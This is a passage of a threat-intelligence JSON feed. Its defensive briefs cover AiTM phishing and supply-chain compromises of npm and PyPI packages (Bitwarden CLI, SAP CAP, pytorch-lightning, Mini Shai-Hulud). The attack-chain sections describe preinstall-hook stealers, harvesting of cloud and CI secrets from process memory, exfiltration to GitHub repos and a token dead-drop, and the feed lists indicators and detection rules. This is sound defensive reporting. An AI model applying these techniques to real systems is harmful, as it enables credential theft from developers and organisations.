{"description":"Trending threats, MITRE ATT\u0026CK coverage, and detection metadata — refreshed continuously.","feed_url":"https://feed.craftedsignal.io/tags/credential-theft/","home_page_url":"https://feed.craftedsignal.io/","items":[{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Microsoft Defender for Office 365"],"_cs_severities":["high"],"_cs_tags":["phishing","credential-theft","AiTM","token-compromise"],"_cs_type":"advisory","_cs_vendors":["Microsoft","Cloudflare","Paubox"],"content_html":"\u003cp\u003eBetween April 14 and 16, 2026, Microsoft Defender Research observed a sophisticated, large-scale phishing campaign targeting over 35,000 users across more than 13,000 organizations in 26 countries, predominantly in the United States (92%). The campaign, which did not focus on a single vertical, impacted a range of industries, with Healthcare \u0026amp; life sciences (19%), Financial services (18%), Professional services (11%), and Technology \u0026amp; software (11%) being the most affected. Attackers employed code of conduct-themed lures delivered via emails that appeared as internal compliance or regulatory communications. 
The campaign utilized a multi-step attack chain, including CAPTCHA challenges and intermediate staging pages, to reinforce legitimacy and filter out automated defenses, ultimately leading to an adversary-in-the-middle (AiTM) phishing flow.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eThe attack begins with phishing emails posing as internal compliance communications, using subjects like \u0026ldquo;Internal case log issued under conduct policy\u0026rdquo;.\u003c/li\u003e\n\u003cli\u003eThe emails contain a PDF attachment (e.g., \u0026ldquo;Awareness Case Log File – Tuesday 14th, April 2026.pdf\u0026rdquo;) that claims a \u0026ldquo;code of conduct review\u0026rdquo; has been initiated.\u003c/li\u003e\n\u003cli\u003eRecipients are instructed to click a “Review Case Materials” link within the PDF.\u003c/li\u003e\n\u003cli\u003eClicking the link redirects the user to one of the attacker-controlled domains (e.g., acceptable-use-policy-calendly[.]de).\u003c/li\u003e\n\u003cli\u003eThe landing page displays a Cloudflare CAPTCHA to validate the user and impede automated analysis.\u003c/li\u003e\n\u003cli\u003eAfter CAPTCHA completion, the user is redirected to an intermediate site that informs them the requested documentation is encrypted and requires account authentication.\u003c/li\u003e\n\u003cli\u003eThe user is presented with a legitimate-looking sign-in experience, part of an AiTM phishing flow.\u003c/li\u003e\n\u003cli\u003eThe attackers proxy the authentication session in real time and capture authentication tokens, granting immediate account access.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eThis campaign resulted in the compromise of authentication tokens, enabling attackers to gain unauthorized access to user accounts and bypass multifactor authentication. 
With more than 35,000 users targeted across over 13,000 organizations, the potential for widespread data breaches, financial fraud, and further malicious activities is significant. The targeting of sectors like Healthcare and Financial Services indicates a focus on high-value targets with sensitive data.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eEducate users about phishing lures, especially those using social engineering tactics and enterprise-style HTML templates.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule \u0026ldquo;Detect Suspicious PDF Opening via Uncommon Applications\u0026rdquo; to identify unusual PDF execution paths, based on the \u0026lsquo;file_event\u0026rsquo; log source.\u003c/li\u003e\n\u003cli\u003eConfigure email security settings in Microsoft Defender for Office 365 to filter out phishing emails effectively.\u003c/li\u003e\n\u003cli\u003eEnable network protection to leverage SmartScreen as a host-based web proxy.\u003c/li\u003e\n\u003cli\u003eBlock access to the attacker-controlled domains, such as acceptable-use-policy-calendly[.]de, at the DNS resolver level.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-05-04T15:00:00Z","date_published":"2026-05-04T15:00:00Z","id":"/briefs/2026-05-aitm-phishing/","summary":"A widespread phishing campaign utilized 'code of conduct' lures, a multi-step attack chain, and legitimate email services to distribute authenticated messages from attacker-controlled domains, ultimately leading to adversary-in-the-middle (AiTM) token compromise, primarily targeting US-based organizations.","title":"Multi-Stage 'Code of Conduct' Phishing Campaign Leads to AiTM Token Compromise","url":"https://feed.craftedsignal.io/briefs/2026-05-aitm-phishing/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Bitwarden 
CLI"],"_cs_severities":["critical"],"_cs_tags":["supply-chain","credential-theft","exfiltration","npm"],"_cs_type":"advisory","_cs_vendors":["Bitwarden"],"content_html":"\u003cp\u003eA compromised Bitwarden CLI npm package allows a remote, anonymous attacker to steal credentials and exfiltrate sensitive information. The specific version of the compromised package is not detailed in the advisory. This supply chain attack targets developers and users who rely on the Bitwarden CLI for managing their passwords and secrets. This attack has the potential to expose sensitive credentials, leading to unauthorized access to systems and data. Defenders need to monitor for unusual activity related to the Bitwarden CLI and its usage within their environments to mitigate this risk.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAttacker compromises a Bitwarden CLI npm package through techniques such as typosquatting, account compromise, or dependency confusion.\u003c/li\u003e\n\u003cli\u003eUnsuspecting developers or users download and install the compromised package from the npm registry.\u003c/li\u003e\n\u003cli\u003eDuring installation, the malicious package executes malicious code injected by the attacker.\u003c/li\u003e\n\u003cli\u003eThe malicious code collects Bitwarden credentials and other sensitive information stored in the CLI\u0026rsquo;s configuration.\u003c/li\u003e\n\u003cli\u003eThe compromised package establishes a covert communication channel (e.g., HTTPS) to an attacker-controlled server.\u003c/li\u003e\n\u003cli\u003eStolen credentials and sensitive information are exfiltrated to the attacker\u0026rsquo;s server.\u003c/li\u003e\n\u003cli\u003eThe attacker uses the stolen credentials to access victim\u0026rsquo;s Bitwarden vaults or other systems.\u003c/li\u003e\n\u003cli\u003eThe attacker may further escalate privileges and compromise additional systems within the victim\u0026rsquo;s environment 
using the stolen credentials.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation leads to the theft of sensitive credentials and information stored within Bitwarden CLI. The number of victims is currently unknown. Organizations using the compromised package could experience unauthorized access to critical systems, data breaches, and potential financial losses. The targeted sectors are broad, encompassing any organization utilizing the Bitwarden CLI for password management and secret storage.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eMonitor npm package installations for unusual activity or unexpected dependencies using process creation logs and file integrity monitoring.\u003c/li\u003e\n\u003cli\u003eImplement strict code review processes for all third-party dependencies, especially those related to security tools like Bitwarden CLI.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule detecting suspicious network connections from the Bitwarden CLI executable to identify potential data exfiltration.\u003c/li\u003e\n\u003cli\u003eEnforce multi-factor authentication (MFA) on Bitwarden accounts to mitigate the impact of credential theft.\u003c/li\u003e\n\u003cli\u003eRegularly audit and review the permissions and access rights associated with Bitwarden CLI credentials.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-05-04T11:28:56Z","date_published":"2026-05-04T11:28:56Z","id":"/briefs/2026-05-bitwarden-cli-compromise/","summary":"A remote attacker can exploit a compromised Bitwarden CLI npm package to steal credentials and exfiltrate sensitive information.","title":"Compromised Bitwarden CLI npm Package Enables Credential Theft and Information 
Exfiltration","url":"https://feed.craftedsignal.io/briefs/2026-05-bitwarden-cli-compromise/"},{"_cs_actors":["TeamPCP"],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["@bitwarden/cli (2026.4.0)","@cap-js/sqlite (2.2.2)","@cap-js/postgres (2.2.2)","@cap-js/db-service (2.10.1)","mbt (1.2.48)","SAP Cloud Application Programming (CAP) Model","checkmarx/kics"],"_cs_severities":["high"],"_cs_tags":["npm","supply-chain","credential-theft","github"],"_cs_type":"threat","_cs_vendors":["npm","GitHub","SAP","Bitwarden","Checkmarx","Microsoft"],"content_html":"\u003cp\u003eThe npm ecosystem is experiencing a surge in sophisticated supply chain attacks following the Shai-Hulud worm in September 2025. Attackers, including TeamPCP, are actively compromising npm packages to gain access to sensitive information and establish persistence within CI/CD pipelines. The attacks have evolved to include wormable propagation, infrastructure-level persistence, and multi-stage payloads designed to evade detection. In April 2026, two campaigns were observed: one included the string \u0026ldquo;Shai-Hulud: The Third Coming,\u0026rdquo; and the other, dubbed \u0026ldquo;Mini Shai-Hulud,\u0026rdquo; targeted the SAP developer ecosystem. 
The compromised packages are often part of SAP\u0026rsquo;s Cloud Application Programming (CAP) Model and multitarget application (MTA) build toolchain, increasing the likelihood of impacting enterprise developers and CI/CD pipelines with access to cloud credentials and GitHub tokens.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eInitial Compromise: Attackers compromise legitimate npm packages, such as @cap-js/sqlite, @cap-js/postgres, @cap-js/db-service, and mbt, by injecting malicious code.\u003c/li\u003e\n\u003cli\u003eMalicious Code Injection: Compromised packages receive two new files: setup.mjs and execution.js, along with a modified package.json containing a \u0026ldquo;preinstall\u0026rdquo; hook.\u003c/li\u003e\n\u003cli\u003eExecution of setup.mjs: During the \u003ccode\u003enpm install\u003c/code\u003e process, the preinstall hook executes setup.mjs, which detects the host OS and architecture.\u003c/li\u003e\n\u003cli\u003eBun Runtime Download and Execution: setup.mjs downloads the Bun JavaScript runtime (v1.3.13) from GitHub releases and extracts it to a temporary directory.\u003c/li\u003e\n\u003cli\u003eExecution of execution.js: The Bun runtime executes execution.js, a large (11.7 MB) obfuscated credential stealer and propagation framework.\u003c/li\u003e\n\u003cli\u003eCredential Harvesting: execution.js harvests GitHub tokens, npm tokens, environment variables, GitHub Actions secrets, AWS STS identity, Azure Key Vault secrets, GCP Secret Manager values, and Kubernetes service account tokens. 
It also targets Claude and MCP configuration files and Electrum wallets.\u003c/li\u003e\n\u003cli\u003eData Exfiltration: The collected data is compressed, encrypted, and exfiltrated to freshly created public GitHub repositories with randomized names and descriptions.\u003c/li\u003e\n\u003cli\u003ePropagation: The malware searches for commits containing the keyword \u0026ldquo;OhNoWhatsGoingOnWithGitHub,\u0026rdquo; decodes matching commit messages as a token dead-drop, recovers stolen GitHub tokens, and uses them to spread the malware to other packages.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eCompromised npm packages can lead to the theft of sensitive credentials, including cloud provider credentials, GitHub tokens, and CI/CD secrets. Successful attacks can result in unauthorized access to cloud infrastructure, code repositories, and deployment pipelines. The Mini Shai-Hulud campaign targeted packages with approximately 570,000 weekly downloads, potentially impacting a large number of SAP developers and enterprise environments. 
The attackers use stolen credentials to further propagate the malware, increasing the scale and scope of the compromise.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eRotate npm tokens and GitHub Personal Access Tokens (PATs) immediately if any affected packages were installed (refer to the list of affected packages in the IOC table).\u003c/li\u003e\n\u003cli\u003eMonitor npm install processes for unexpected execution of \u003ccode\u003enode setup.mjs\u003c/code\u003e (see Attack Chain).\u003c/li\u003e\n\u003cli\u003eImplement the Sigma rule \u0026ldquo;Detect Suspicious Bun Process Execution\u0026rdquo; to identify potential execution of the Bun runtime from temporary directories.\u003c/li\u003e\n\u003cli\u003eMonitor network connections for unusual processes connecting to \u003ccode\u003eapi.github[.]com/search/commits?q=OhNoWhatsGoingOnWithGitHub\u003c/code\u003e (see IOCs) to detect potential C2 activity.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule \u0026ldquo;Detect Github Commit By Claude Email\u0026rdquo; to identify commits authored with the email \u003ccode\u003eclaude@users.noreply.github.com\u003c/code\u003e to detect malicious commits.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-05-02T00:10:33Z","date_published":"2026-05-02T00:10:33Z","id":"/briefs/2026-05-npm-supply-chain/","summary":"Threat actors are compromising npm packages, including those targeting SAP developers, to steal credentials, embed themselves in CI/CD pipelines, and deploy multi-stage payloads using techniques like wormable propagation and covert C2 channels on GitHub.","title":"Increased npm Supply Chain Attacks Targeting SAP 
Developers","url":"https://feed.craftedsignal.io/briefs/2026-05-npm-supply-chain/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["pytorch-lightning"],"_cs_severities":["critical"],"_cs_tags":["supply-chain","pypi","credential-theft","malware"],"_cs_type":"advisory","_cs_vendors":["GitHub"],"content_html":"\u003cp\u003eOn April 30, 2026, two malicious versions (2.6.2 and 2.6.3) of the widely used \u003ccode\u003epytorch-lightning\u003c/code\u003e package were published to the PyPI registry after the publisher account was compromised. These versions contain embedded malicious code designed to steal developer credentials and republish infected versions of repositories to which the stolen tokens have access. The attack is triggered upon importing the package, initiating a background process that silently harvests credentials from a wide array of services, including AWS, Azure, Google Cloud, and GitHub, as well as local environment variables and credential files. Version 2.6.3 was published just 13 minutes after 2.6.2, and was intended to evade detection.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAttacker compromises the publisher account for the \u003ccode\u003epytorch-lightning\u003c/code\u003e package on PyPI.\u003c/li\u003e\n\u003cli\u003eAttacker publishes malicious versions 2.6.2 and 2.6.3 to PyPI.\u003c/li\u003e\n\u003cli\u003eA modified \u003ccode\u003e__init__.py\u003c/code\u003e file within the package initiates a background process upon import.\u003c/li\u003e\n\u003cli\u003eThe background process executes silently, without any visible output or indication of compromise to the user.\u003c/li\u003e\n\u003cli\u003eThe malicious package downloads a runtime (Bun) from GitHub.\u003c/li\u003e\n\u003cli\u003eThe package executes a large, obfuscated JavaScript file, targeting AWS, Azure, Google Cloud, GitHub, and local credential stores.\u003c/li\u003e\n\u003cli\u003eStolen 
credentials, including cloud provider keys, API tokens, and secrets, are exfiltrated to attacker-controlled infrastructure.\u003c/li\u003e\n\u003cli\u003eThe malware attempts to download and execute a second-stage payload from attacker-controlled infrastructure, expanding the scope of the attack.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eOrganizations that downloaded and used versions 2.6.2 or 2.6.3 of the \u003ccode\u003epytorch-lightning\u003c/code\u003e package are at high risk of compromise. The malicious package is designed to steal a wide range of credentials, including cloud provider keys, API tokens, and secrets stored in environment variables. This can lead to unauthorized access to sensitive data and systems, potentially resulting in data breaches, financial losses, and reputational damage. The malware\u0026rsquo;s ability to download and execute secondary payloads further increases the potential impact.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eImmediately remove versions 2.6.2 and 2.6.3 of the \u003ccode\u003elightning\u003c/code\u003e package from all systems where they are installed (see overview).\u003c/li\u003e\n\u003cli\u003eAudit systems for unauthorized processes and review outbound network connections to detect potential compromises (see overview).\u003c/li\u003e\n\u003cli\u003eRotate all cloud provider keys (AWS, Azure, GCP), API tokens (GitHub, CI/CD systems), and secrets stored in environment variables to prevent further unauthorized access (see Attack Chain).\u003c/li\u003e\n\u003cli\u003eImplement the \u003ccode\u003eDetect Suspicious PyPI Package Installation\u003c/code\u003e Sigma rule to identify potential malicious packages being installed in the future (see rules).\u003c/li\u003e\n\u003cli\u003eImplement the \u003ccode\u003eDetect Credential Harvesting via Bun\u003c/code\u003e Sigma rule to catch execution of the 
malicious JavaScript payload (see rules).\u003c/li\u003e\n\u003cli\u003ePin dependencies to known-good versions and verify package integrity before use to prevent future supply chain attacks (see references).\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-05-01T00:45:31Z","date_published":"2026-05-01T00:45:31Z","id":"/briefs/2026-05-pytorch-lightning-compromise/","summary":"Compromised PyTorch Lightning packages versions 2.6.2 and 2.6.3 on PyPI contain malicious code to steal developer credentials from cloud and developer environments, and republish infected packages.","title":"Compromised PyTorch Lightning Packages on PyPI Steal Developer Credentials","url":"https://feed.craftedsignal.io/briefs/2026-05-pytorch-lightning-compromise/"},{"_cs_actors":["Storm-1747"],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Microsoft Defender"],"_cs_severities":["high"],"_cs_tags":["email","phishing","credential-theft","Tycoon2FA","BEC"],"_cs_type":"threat","_cs_vendors":["Microsoft"],"content_html":"\u003cp\u003eIn the first quarter of 2026, Microsoft Threat Intelligence observed a significant rise in email-based phishing threats, totaling approximately 8.3 billion. This increase was driven by surges in QR code phishing (more than doubling over the period), CAPTCHA-gated phishing, and credential phishing attacks. Microsoft\u0026rsquo;s Digital Crime Unit successfully disrupted the Tycoon2FA phishing-as-a-service (PhaaS) platform in early March, leading to a 15% reduction in associated email volume. However, threat actors adapted by shifting hosting providers and domain registration patterns. Business email compromise (BEC) also remained a prevalent threat, with approximately 10.7 million attacks recorded during the quarter, often characterized by low-effort, generic outreach messages. 
Microsoft Defender Research has also noted the emergence of AI-enabled device code phishing campaigns.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003e\u003cstrong\u003eInitial Email Delivery:\u003c/strong\u003e Attackers send phishing emails impersonating legitimate services or organizations. These emails may contain links, QR codes, or HTML attachments.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eVictim Interaction:\u003c/strong\u003e The victim opens the email and clicks on a malicious link or scans a QR code, redirecting them to a phishing page.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003ePhishing Page Redirection:\u003c/strong\u003e The phishing page mimics a legitimate login portal, such as Microsoft 365 or other enterprise applications.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eCredential Harvesting:\u003c/strong\u003e The victim enters their username and password on the phishing page, which are then captured by the attacker.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eMFA Bypass (AiTM):\u003c/strong\u003e For attacks using adversary-in-the-middle (AiTM) techniques (like those facilitated by Tycoon2FA), the attacker intercepts the MFA code and uses it to authenticate.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eAccount Compromise:\u003c/strong\u003e With the stolen credentials and MFA code (if applicable), the attacker gains unauthorized access to the victim\u0026rsquo;s account.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eLateral Movement/Data Theft:\u003c/strong\u003e The attacker uses the compromised account to access sensitive data, send further phishing emails, or move laterally within the organization.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eBusiness Email Compromise:\u003c/strong\u003e In BEC attacks, attackers use compromised accounts or spoofed email addresses to send fraudulent invoices or requests for wire 
transfers.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eThe observed email threats in Q1 2026 led to a high risk of credential compromise, financial loss through BEC attacks, and potential data breaches across various sectors. Although the total number of victims is not specified, the billions of phishing attempts indicate a widespread impact. Microsoft\u0026rsquo;s disruption of Tycoon2FA temporarily reduced phishing volumes by 15%, demonstrating the potential for proactive intervention to mitigate these threats. However, threat actors are quickly adapting their techniques, indicating the need for continued vigilance and enhanced security measures. The 10.7 million BEC attacks alone represent a significant financial threat to businesses.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the \u0026ldquo;Detect Tycoon2FA Phishing Attempts\u0026rdquo; Sigma rule to identify email campaigns associated with the Tycoon2FA platform.\u003c/li\u003e\n\u003cli\u003eEnable Microsoft Defender detections to improve detection of phishing emails and malicious payloads.\u003c/li\u003e\n\u003cli\u003eMonitor email traffic for suspicious domain registrations, particularly those using newer generic top-level domains (TLDs) such as .DIGITAL, .BUSINESS, .CONTRACTORS, .CEO, and .COMPANY, and the resurgence of .RU registrations, to identify potential Tycoon2FA infrastructure shifts.\u003c/li\u003e\n\u003cli\u003eEducate users about the dangers of QR code phishing and CAPTCHA-gated attacks, emphasizing the importance of verifying the legitimacy of login pages and email senders, to reduce the effectiveness of phishing campaigns (T1566).\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-30T15:00:00Z","date_published":"2026-04-30T15:00:00Z","id":"/briefs/2026-05-email-phishing-trends/","summary":"In Q1 2026, email threats increased, including credential 
phishing, QR code phishing, and CAPTCHA-gated campaigns, with Microsoft's disruption of the Tycoon2FA phishing platform leading to a 15% volume decrease and shifts in threat actor tactics; BEC activity remained prevalent at 10.7 million attacks.","title":"Q1 2026 Email Threat Landscape: Rise in Phishing Techniques and Tycoon2FA Disruption","url":"https://feed.craftedsignal.io/briefs/2026-05-email-phishing-trends/"},{"_cs_actors":["TeamPCP"],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Cloud Application Programming (CAP)","Cloud MTA Build Tool","@cap-js/db-service","@cap-js/postgres","@cap-js/sqlite","github.com"],"_cs_severities":["critical"],"_cs_tags":["supply-chain","npm","sap","credential-theft"],"_cs_type":"threat","_cs_vendors":["SAP","GitHub"],"content_html":"\u003cp\u003eThe Mini Shai-Hulud campaign, active as of April 2026, targets SAP NPM packages used in the SAP Cloud Application Programming (CAP) ecosystem and SAP cloud deployment workflows. Four package versions were compromised: \u003ccode\u003embt 1.2.48\u003c/code\u003e, \u003ccode\u003e@cap-js/db-service 2.10.1\u003c/code\u003e, \u003ccode\u003e@cap-js/postgres 2.2.2\u003c/code\u003e, and \u003ccode\u003e@cap-js/sqlite 2.2.2\u003c/code\u003e. These packages, with over 500,000 combined weekly downloads, are essential for SAP\u0026rsquo;s Cloud MTA Build Tool and database services for CAP software. The attackers injected a preinstall script that fetches and executes a Bun binary, bypassing security monitoring. The malicious versions were available for a short window of 2-4 hours before being unpublished and superseded by clean versions. 
Wiz attributes this activity to TeamPCP due to a shared RSA public key used to encrypt the exfiltrated secrets.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eThe attacker compromises an NPM token, possibly exposed through CircleCI.\u003c/li\u003e\n\u003cli\u003eThe attacker injects a malicious \u003ccode\u003epreinstall\u003c/code\u003e script into the targeted SAP NPM packages (\u003ccode\u003embt\u003c/code\u003e, \u003ccode\u003e@cap-js/db-service\u003c/code\u003e, \u003ccode\u003e@cap-js/postgres\u003c/code\u003e, \u003ccode\u003e@cap-js/sqlite\u003c/code\u003e).\u003c/li\u003e\n\u003cli\u003eWhen a user installs the compromised package, the \u003ccode\u003epreinstall\u003c/code\u003e script executes.\u003c/li\u003e\n\u003cli\u003eThe script fetches a Bun ZIP archive from a GitHub repository.\u003c/li\u003e\n\u003cli\u003eThe script extracts the Bun archive and executes the included Bun binary.\u003c/li\u003e\n\u003cli\u003eThe Bun binary steals local credentials, GitHub and NPM tokens, AWS, Azure, GCP, GitHub Action, and Kubernetes secrets.\u003c/li\u003e\n\u003cli\u003eThe stolen data is exfiltrated to public GitHub repositories with the description \u0026ldquo;A Mini Shai-Hulud has Appeared\u0026rdquo;.\u003c/li\u003e\n\u003cli\u003eThe malware propagates by modifying package tarballs, updating versions, repackaging them, and publishing them using stolen GitHub Actions tokens.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eThe Mini Shai-Hulud attack poses a significant threat to developers and organizations using SAP CAP, a framework for S/4HANA extensions, Fiori app backends, MTAs, and integration flows. With over 500,000 weekly downloads of the affected packages, a large number of systems could have been affected. 
Successful exploitation allows attackers to steal sensitive credentials and cloud secrets, potentially leading to unauthorized access to critical SAP systems, cloud infrastructure, and source code repositories. This access could be used for further malicious activities, including data breaches, financial fraud, and supply chain compromise.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eOrganizations using SAP Business Technology Platform workflows, SAP CAP, or MTA-based deployment pipelines should immediately check if they installed the malicious package versions (\u003ccode\u003embt 1.2.48\u003c/code\u003e, \u003ccode\u003e@cap-js/db-service 2.10.1\u003c/code\u003e, \u003ccode\u003e@cap-js/postgres 2.2.2\u003c/code\u003e, \u003ccode\u003e@cap-js/sqlite 2.2.2\u003c/code\u003e) during the exposure window.\u003c/li\u003e\n\u003cli\u003eImplement network monitoring rules to detect connections to unusual GitHub repositories created to host stolen data. Monitor for repositories with the description \u0026ldquo;A Mini Shai-Hulud has Appeared\u0026rdquo;.\u003c/li\u003e\n\u003cli\u003eMonitor process execution for the execution of \u003ccode\u003ebun\u003c/code\u003e binaries in unusual or unexpected locations to identify systems where compromised packages were installed. 
Deploy the Sigma rule \u003ccode\u003eDetect Bun Execution From NPM Package\u003c/code\u003e to detect this behavior.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-30T14:27:36Z","date_published":"2026-04-30T14:27:36Z","id":"/briefs/2026-04-mini-shai-hulud/","summary":"The Mini Shai-Hulud campaign injected malicious code into SAP NPM packages, targeting credentials and cloud secrets related to SAP Cloud Application Programming (CAP) and SAP cloud deployment workflows, exfiltrating data through public GitHub repositories.","title":"Mini Shai-Hulud Supply Chain Attack Targets SAP NPM Packages","url":"https://feed.craftedsignal.io/briefs/2026-04-mini-shai-hulud/"},{"_cs_actors":["TeamPCP"],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Cloud Application Programming Model (CAP)","Cloud MTA"],"_cs_severities":["critical"],"_cs_tags":["supply-chain","credential-theft","npm"],"_cs_type":"threat","_cs_vendors":["SAP"],"content_html":"\u003cp\u003eOn April 29, 2026, security researchers discovered that multiple official SAP npm packages were compromised in a supply-chain attack, suspected to be carried out by TeamPCP. The compromised packages, including \u003ccode\u003e@cap-js/sqlite\u003c/code\u003e (v2.2.2), \u003ccode\u003e@cap-js/postgres\u003c/code\u003e (v2.2.2), \u003ccode\u003e@cap-js/db-service\u003c/code\u003e (v2.10.1), and \u003ccode\u003embt\u003c/code\u003e (v1.2.48), support SAP\u0026rsquo;s Cloud Application Programming Model (CAP) and Cloud MTA, commonly used in enterprise development. The attack involves injecting a malicious \u0026lsquo;preinstall\u0026rsquo; script into these packages, which executes automatically during installation. This script downloads and executes a heavily obfuscated JavaScript payload designed to steal sensitive credentials from developer machines and CI/CD environments. 
This incident highlights the ongoing risk of supply chain attacks targeting widely used development tools.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003e\u003cstrong\u003eInitial Compromise:\u003c/strong\u003e Threat actors compromise official SAP npm packages (\u003ccode\u003e@cap-js/sqlite\u003c/code\u003e, \u003ccode\u003e@cap-js/postgres\u003c/code\u003e, \u003ccode\u003e@cap-js/db-service\u003c/code\u003e, \u003ccode\u003embt\u003c/code\u003e). The exact method of initial compromise is currently unknown, but a misconfigured CircleCI job is suspected.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003ePackage Modification:\u003c/strong\u003e The compromised npm packages are modified to include a malicious \u0026lsquo;preinstall\u0026rsquo; script.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eInstallation Trigger:\u003c/strong\u003e When developers install the compromised packages using \u003ccode\u003enpm install\u003c/code\u003e, the \u0026lsquo;preinstall\u0026rsquo; script executes automatically.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003ePayload Download:\u003c/strong\u003e The \u0026lsquo;preinstall\u0026rsquo; script launches a loader named \u003ccode\u003esetup.mjs\u003c/code\u003e that downloads the Bun JavaScript runtime from GitHub.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eExecution of Information Stealer:\u003c/strong\u003e The Bun runtime is used to execute a heavily obfuscated \u003ccode\u003eexecution.js\u003c/code\u003e payload, which acts as an information stealer.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eCredential Theft:\u003c/strong\u003e The information stealer targets a wide variety of credentials, including npm and GitHub authentication tokens, SSH keys, cloud credentials for AWS, Azure, and Google Cloud, Kubernetes configurations and secrets, and CI/CD pipeline secrets and environment variables.  
It also attempts to extract secrets directly from the CI runner\u0026rsquo;s memory by scanning \u003ccode\u003e/proc/\u0026lt;pid\u0026gt;/maps\u003c/code\u003e and \u003ccode\u003e/proc/\u0026lt;pid\u0026gt;/mem\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eData Exfiltration:\u003c/strong\u003e The stolen data is encrypted and uploaded to public GitHub repositories under the victim\u0026rsquo;s account. These repositories include the description \u0026ldquo;A Mini Shai-Hulud has Appeared\u0026rdquo;.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eLateral Movement:\u003c/strong\u003e The malware searches GitHub commits for the string \u003ccode\u003eOhNoWhatsGoingOnWithGitHub:\u0026lt;base64\u0026gt;\u003c/code\u003e, decoding matching commit messages into GitHub tokens to gain further access and propagate to other packages and repositories, injecting the same malicious code.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eThis supply chain attack can lead to the theft of sensitive credentials, allowing attackers to gain unauthorized access to internal systems, cloud infrastructure, and source code repositories. The compromised credentials and secrets can be used for lateral movement within the victim\u0026rsquo;s network, data exfiltration, and further supply chain attacks. 
